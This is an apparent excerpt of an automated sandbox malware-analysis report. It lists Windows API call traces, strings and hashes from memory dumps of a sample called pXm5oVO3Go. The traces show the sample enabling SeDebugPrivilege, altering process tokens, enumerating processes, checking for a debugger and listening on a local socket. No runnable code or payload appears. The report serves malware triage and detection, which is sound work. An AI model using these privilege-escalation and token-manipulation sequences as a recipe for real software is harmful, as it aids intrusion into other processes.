                                    • Part of subcall function 03641776: GetCurrentProcess.KERNEL32(00000028,?), ref: 0364178C
                                    • Part of subcall function 03641776: OpenProcessToken.ADVAPI32(00000000), ref: 03641793
                                    • Part of subcall function 03641802: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03641825
                                    • Part of subcall function 03641802: _memset.LIBCMT ref: 0364183A
                                    • Part of subcall function 03641802: Process32FirstW.KERNEL32(00000000,?), ref: 03641854
                                    • Part of subcall function 03641802: CloseHandle.KERNEL32(00000000), ref: 0364188E
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 03641931
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 0364194B
                                  • CloseHandle.KERNEL32(?), ref: 03641958
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 0364198E
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 03641BD1
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 03641BEF
                                  • CloseHandle.KERNEL32(?), ref: 03641BFC
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 03641C35
                                  • GetLengthSid.ADVAPI32(?), ref: 03641E21
                                  • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 03641E34
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 03641E69
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 03641E87
                                  • CloseHandle.KERNEL32(?), ref: 03641E94
                                  • GetLengthSid.ADVAPI32(?), ref: 036420B9
                                  • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 036420CC
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 03642165
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 03641ECD
                                    • Part of subcall function 036418A4: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 036418DC
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 03642101
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 0364211F
                                  • CloseHandle.KERNEL32(?), ref: 0364212C
                                  • GetLengthSid.ADVAPI32(?), ref: 03642351
                                  • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 03642364
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                  • String ID: $ $SeDebugPrivilege
                                  • API String ID: 2960649016-2587268233
                                  • Opcode ID: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                  • Instruction ID: cb7786526c9b47751bc118758fdd2b6d5f546ff27575984a49d954f5362a9a0c
                                  • Opcode Fuzzy Hash: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                  • Instruction Fuzzy Hash: CE720E76E0110DBFDF05DBA4DD80DEEB7BEAF49250B184026F515E7180DB34EA868B64
                                  APIs
                                    • Part of subcall function 10001772: GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                    • Part of subcall function 10001772: OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                    • Part of subcall function 100017FE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
                                    • Part of subcall function 100017FE: _memset.LIBCMT ref: 10001836
                                    • Part of subcall function 100017FE: Process32FirstW.KERNEL32(00000000,?), ref: 10001850
                                    • Part of subcall function 100017FE: CloseHandle.KERNEL32(00000000), ref: 1000188A
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 1000192D
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001947
                                  • CloseHandle.KERNEL32(?), ref: 10001954
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1000198A
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                  • CloseHandle.KERNEL32(?), ref: 10001BF8
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001C31
                                  • GetLengthSid.ADVAPI32(?), ref: 10001E1D
                                  • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10001E30
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                  • CloseHandle.KERNEL32(?), ref: 10001E90
                                  • GetLengthSid.ADVAPI32(?), ref: 100020B5
                                  • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 100020C8
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10002161
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001EC9
                                    • Part of subcall function 100018A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                  • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                  • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                  • CloseHandle.KERNEL32(?), ref: 10002128
                                  • GetLengthSid.ADVAPI32(?), ref: 1000234D
                                  • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10002360
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                  • String ID: $ $SeDebugPrivilege
                                  • API String ID: 2960649016-2587268233
                                  • Opcode ID: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                  • Instruction ID: 4d650f447e6b2555350515b06da2e3085c12b1ca455cb5b9c8c7034ce516d686
                                  • Opcode Fuzzy Hash: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                  • Instruction Fuzzy Hash: B67228B6E0010EBBEB40DBA4DD80DEEB7FEEF48290B514026F505E7145DB34EA468B65
                                  APIs
                                  • _memset.LIBCMT ref: 004230F3
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000A28), ref: 00423108
                                    • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405539
                                    • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 0040555A
                                    • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405578
                                    • Part of subcall function 00405520: _memmove.LIBCMT ref: 004055EF
                                    • Part of subcall function 00404C10: std::_Xinvalid_argument.LIBCPMT ref: 00404C2A
                                    • Part of subcall function 00405630: std::_Xinvalid_argument.LIBCPMT ref: 00405696
                                    • Part of subcall function 00405630: std::_Xinvalid_argument.LIBCPMT ref: 004056B4
                                    • Part of subcall function 00405630: _memmove.LIBCMT ref: 00405710
                                  • GetCurrentProcess.KERNEL32(00000000,00000001,00000004,00000004), ref: 00423367
                                  • SymInitialize.DBGHELP(00000000), ref: 0042336E
                                  • SymSetOptions.DBGHELP(00000004), ref: 00423376
                                  • CreateFileW.KERNEL32(?,001F01FF,00000003,00000000,00000002,00000000,00000000), ref: 0042339A
                                  • GetCurrentThreadId.KERNEL32 ref: 004233A6
                                  • GetCurrentProcessId.KERNEL32 ref: 004233D3
                                  • GetCurrentProcess.KERNEL32(00000000), ref: 004233DA
                                  • MiniDumpWriteDump.DBGHELP(00000000), ref: 004233E1
                                  • CloseHandle.KERNEL32(00000000), ref: 004233E8
                                  • CreateFileW.KERNEL32(?,001F01FF,00000003,00000000,00000002,00000000,00000000), ref: 0042341C
                                  • _memset.LIBCMT ref: 004234EE
                                  • GetCurrentThread.KERNEL32 ref: 0042355B
                                  • GetCurrentProcess.KERNEL32(00000000,?,Stack:,00000008,?,?,?,?,?,?,?,?,?,00000000,000000FF,?), ref: 00423562
                                  • StackWalk.DBGHELP(0000014C,00000000,?,Stack:,00000008,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042356E
                                  • GetCurrentThreadId.KERNEL32 ref: 004235EE
                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,Stack:,00000008), ref: 00423640
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,Stack:,00000008), ref: 00423647
                                    • Part of subcall function 004239F0: _vswprintf_s.LIBCMT ref: 00423A01
                                  Strings
                                  • Version:%dThreadID:%d%s%s%s, xrefs: 004235F7
                                  • ExceptionCode: %08X, xrefs: 00423435
                                  • 0x%08X [UNKNOWN], xrefs: 0042357B
                                  • Stack:, xrefs: 004234B1
                                  • \, xrefs: 0042324B
                                  • .dmp, xrefs: 00423354
                                  • Register:EAX = %08X EBX = %08X ECX = %08X EDX = %08X ESI = %08XEDI = %08X CS:EIP = %08X:%08X SS:ESP = %08X:%08X EBP = %08X EFL = %08X, xrefs: 0042349C
                                  • .txt, xrefs: 0042333E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Current$Xinvalid_argumentstd::_$FileProcess$Thread$CloseCreateDumpHandleWrite_memmove_memset$InitializeMiniModuleNameOptionsStackWalk_vswprintf_s
                                  • String ID: .dmp$.txt$0x%08X [UNKNOWN]$ExceptionCode: %08X$Register:EAX = %08X EBX = %08X ECX = %08X EDX = %08X ESI = %08XEDI = %08X CS:EIP = %08X:%08X SS:ESP = %08X:%08X EBP = %08X EFL = %08X$Stack:$Version:%dThreadID:%d%s%s%s$\
                                  • API String ID: 54164247-1109514319
                                  • Opcode ID: 59f8e66c929f971016c73f06a144d3e253b3ed5b74d68ad38f8afa825a161306
                                  • Instruction ID: bafe23864652bb294b4313159d71bdccdb10557af2fec6effddf2e28871845b8
                                  • Opcode Fuzzy Hash: 59f8e66c929f971016c73f06a144d3e253b3ed5b74d68ad38f8afa825a161306
                                  • Instruction Fuzzy Hash: 01226DB1E002289BDB24DF64DD89ADAB7B9FF48300F4045EAE509A7241DB786F84CF55
                                  APIs
                                  • WSAStartup.WS2_32(00000002,?), ref: 00417D86
                                  • htons.WS2_32(?), ref: 00417DC0
                                  • inet_addr.WS2_32(127.0.0.1), ref: 00417DCE
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 00417DE0
                                  • bind.WS2_32(?,?,00000010), ref: 00417E08
                                  • WSAGetLastError.WS2_32 ref: 00417E1F
                                  • WSAAsyncSelect.WS2_32(?,?,000007EA,0000002B), ref: 00417E49
                                  • listen.WS2_32(?,00000005), ref: 00417E58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AsyncErrorLastSelectStartupbindhtonsinet_addrlistensocket
                                  • String ID: 127.0.0.1$StartSocket...
                                  • API String ID: 3800711040-1162760937
                                  • Opcode ID: 90a2da92531660c50f7c2a97172e7af511809c7020e31ab3bc1c4674d8947ae0
                                  • Instruction ID: 258e4a67c202dd449cfd1b1360ce0c43d314572bd7a9a82ef3901eb94b91037a
                                  • Opcode Fuzzy Hash: 90a2da92531660c50f7c2a97172e7af511809c7020e31ab3bc1c4674d8947ae0
                                  • Instruction Fuzzy Hash: 8941D3B0644345ABE7249B70EC4ABE773E5FF18710F004A2DF55A862C1EF78A4448B5A
                                  APIs
                                  • __EH_prolog3_catch.LIBCMT ref: 005390D6
                                  • FindResourceW.KERNEL32(?,?,00000005,00000024,004114B0), ref: 0053910C
                                  • LoadResource.KERNEL32(?,00000000), ref: 00539114
                                    • Part of subcall function 0053EC22: UnhookWindowsHookEx.USER32(?), ref: 0053EC52
                                  • LockResource.KERNEL32(?,00000024,004114B0), ref: 00539125
                                  • GetDesktopWindow.USER32 ref: 00539158
                                  • IsWindowEnabled.USER32(?), ref: 00539166
                                  • EnableWindow.USER32(?,00000000), ref: 00539175
                                    • Part of subcall function 0053B775: IsWindowEnabled.USER32(?), ref: 0053B77E
                                    • Part of subcall function 0053B790: EnableWindow.USER32(?,00000000), ref: 0053B7A1
                                  • EnableWindow.USER32(?,00000001), ref: 0053925A
                                  • GetActiveWindow.USER32 ref: 00539265
                                  • SetActiveWindow.USER32(?,?,00000024,004114B0), ref: 00539273
                                  • FreeResource.KERNEL32(?,?,00000024,004114B0), ref: 0053928F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                  • String ID:
                                  • API String ID: 964565984-0
                                  • Opcode ID: 96c95dacf5705ef83efc67444fa27abffda69ad9edc185888e3778d6d5b0d639
                                  • Instruction ID: 668ea03494b8bc24eaf7ce0195cf000f674f039c80b556bab3a0e27abac4c7fd
                                  • Opcode Fuzzy Hash: 96c95dacf5705ef83efc67444fa27abffda69ad9edc185888e3778d6d5b0d639
                                  • Instruction Fuzzy Hash: 71516D74A00B06EBDF21AFA5C8496BEBFB2BF84701F140529F542B62A1DBB48D41CB55
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0064614E
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00646163
                                  • UnhandledExceptionFilter.KERNEL32((s), ref: 0064616E
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0064618A
                                  • TerminateProcess.KERNEL32(00000000), ref: 00646191
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID: (s
                                  • API String ID: 2579439406-4025125864
                                  • Opcode ID: 590569b17a94d60cce8e1711f7611406b4c99bc602f72b8ad344e3ec371f229d
                                  • Instruction ID: 72d3c0b1ab5e0624a2c195f8caf202a4eab88d93e3995a920d16c1fd9a1fd053
                                  • Opcode Fuzzy Hash: 590569b17a94d60cce8e1711f7611406b4c99bc602f72b8ad344e3ec371f229d
                                  • Instruction Fuzzy Hash: 7121FEB4801304DFF700DF25FD887883BA6BB0831AF109119F409832A1F7B96A948F8E
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0364178C
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 03641793
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,1001A640,?), ref: 036417AC
                                  • CloseHandle.KERNEL32(?), ref: 036417B9
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 036417EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 3038321057-2896544425
                                  • Opcode ID: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                  • Instruction ID: 36183dbd31fe39ae03a2e9c83c0720ec8855b01fce3defeb04d3089fdf75a337
                                  • Opcode Fuzzy Hash: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                  • Instruction Fuzzy Hash: 1711ED70E0021DEBEF41DFA1CD89BEEBBB8BB08704F104015E601EA290D774D6499B60
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,1001A640,?), ref: 100017A8
                                  • CloseHandle.KERNEL32(?), ref: 100017B5
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100017E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 3038321057-2896544425
                                  • Opcode ID: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                  • Instruction ID: c108f7e3a1cbaa3bedbfb9ced3ce46b093c37afba01755d79af1fd4902adef89
                                  • Opcode Fuzzy Hash: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                  • Instruction Fuzzy Hash: A8112D70A04219ABFB40CFE1CC89BEEBBB8FB08744F114019E601EA180D774EA499B60
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,006586BD,?,0064E425,?,000000BC,?,00000001,00000000,00000000), ref: 006580BF
                                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,006586BD,?,0064E425,?,000000BC,?,00000001,00000000,00000000), ref: 006580E8
                                  • GetACP.KERNEL32(?,?,006586BD,?,0064E425,?,000000BC,?,00000001,00000000), ref: 006580FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 0ab6d37895909ae40350038d44c2fae9a675c6e6193aeeb000ac7a1079539c95
                                  • Instruction ID: 3294278cb8db95d67fdc967bfad10ee34ed01861aba8af19052e29f188eed78f
                                  • Opcode Fuzzy Hash: 0ab6d37895909ae40350038d44c2fae9a675c6e6193aeeb000ac7a1079539c95
                                  • Instruction Fuzzy Hash: 2201D43060521BBEEB219B54EC05F9A77ABAB0075AF140119F901F39C0EFA0CA899358
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428B4E
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00428B6D
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00428CDC
                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000001), ref: 00428CF1
                                  • CloseHandle.KERNEL32(?,80004005,80070057,?,?,?,?,00000001), ref: 00428D59
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 1789362936-0
                                  • Opcode ID: 995ed7f47f2d1cc03e10d24073f02005f373c432020d6df61f39b8e01364367c
                                  • Instruction ID: 25a12b0859ee96136ed525bf436629f29b4ffa2cae606a54a48bf79648aa9e36
                                  • Opcode Fuzzy Hash: 995ed7f47f2d1cc03e10d24073f02005f373c432020d6df61f39b8e01364367c
                                  • Instruction Fuzzy Hash: 8571C0316026259FD710DF28DC88BAEB3B5FF54320F50869DE529AB2D0DB34AE45CB94
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0364CE19
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0364CE2E
                                  • UnhandledExceptionFilter.KERNEL32(10018614), ref: 0364CE39
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0364CE55
                                  • TerminateProcess.KERNEL32(00000000), ref: 0364CE5C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                  • Instruction ID: 7fd9e27d07c86ef8fdc8db48659d84fcdd6e1b5d2b141cbffc0a551109054a45
                                  • Opcode Fuzzy Hash: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                  • Instruction Fuzzy Hash: 1421CFBC804364EFF700DF68C9C46947BAABB28714F60416AF50887AA0E7705687CF09
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 1000CE15
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000CE2A
                                  • UnhandledExceptionFilter.KERNEL32(10018614), ref: 1000CE35
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 1000CE51
                                  • TerminateProcess.KERNEL32(00000000), ref: 1000CE58
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                  • Instruction ID: db866b1daaedd4f763d18a4d884832a689f87af637e38a2f1d611465a9a4395e
                                  • Opcode Fuzzy Hash: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                  • Instruction Fuzzy Hash: C921BEBC8043A8EBF741DF24C8C46847BAAFB28755F60412AF40887AA1E7709787CF15
                                  APIs
                                  • ____lc_handle_func.LIBCMT ref: 0066F48C
                                    • Part of subcall function 006392A3: __getptd.LIBCMT ref: 006392A3
                                  • GetLocaleInfoW.KERNEL32(?,00000022,0066C2F1,00000002,?,?,?,0066C2F1,?,?,?,0000003F,006FCEF4,00000000), ref: 0066F494
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: InfoLocale____lc_handle_func__getptd
                                  • String ID: 2
                                  • API String ID: 4216669283-450215437
                                  • Opcode ID: d0ebc289571ca25990eeb6bc16180c8721a08dab3e40848e5c1ee51a5684789d
                                  • Instruction ID: 052237959bd79512a00b67ffc9a1d0751408f652643aa98fe32952456ea8a607
                                  • Opcode Fuzzy Hash: d0ebc289571ca25990eeb6bc16180c8721a08dab3e40848e5c1ee51a5684789d
